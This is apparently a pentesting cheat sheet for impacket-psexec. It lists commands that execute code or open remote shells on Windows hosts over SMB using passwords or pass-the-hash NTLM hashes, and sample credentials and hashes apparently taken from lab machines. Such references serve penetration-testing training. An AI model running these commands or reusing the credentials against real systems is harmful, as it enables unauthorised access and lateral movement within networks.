ToolsFebruary 9, 20261 min readby 0xt0pus

impacket-psexec

Remote command execution tool using SMB/RPC for lateral movement in Windows environments

#active-directory#windows#impacket#lateral-movement

Impacket-psexec

Description

Impacket-psexec is used for remote command execution on Windows machines via SMB. It creates a service on the target to execute commands and can be used with plaintext passwords or NTLM hashes.

Usage 1: Execute Command with Domain Credentials

Command:

impacket-psexec DOMAIN/username:Password@TARGET "cmd.exe /c whoami & ipconfig /all"

Usage 2: Execute Command with Local Credentials

Command:

impacket-psexec username:Password@TARGET "cmd.exe /c whoami"

Usage 3: Get Interactive Shell

Command:

impacket-psexec username:Password@TARGET

Usage 4: Pass the Hash

Use NTLM hash instead of password for authentication.

Command:

impacket-psexec administrator@egotistical-bank.local -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

Usage 5: Using psexec.py (Python script variant)

Command:

python3 psexec.py administrator:'4dD!5}x/re8]FBuZ'@10.10.10.149

Usage 6: Domain Authentication

Command:

impacket-psexec corp/jen:Nexus123!@192.168.145.72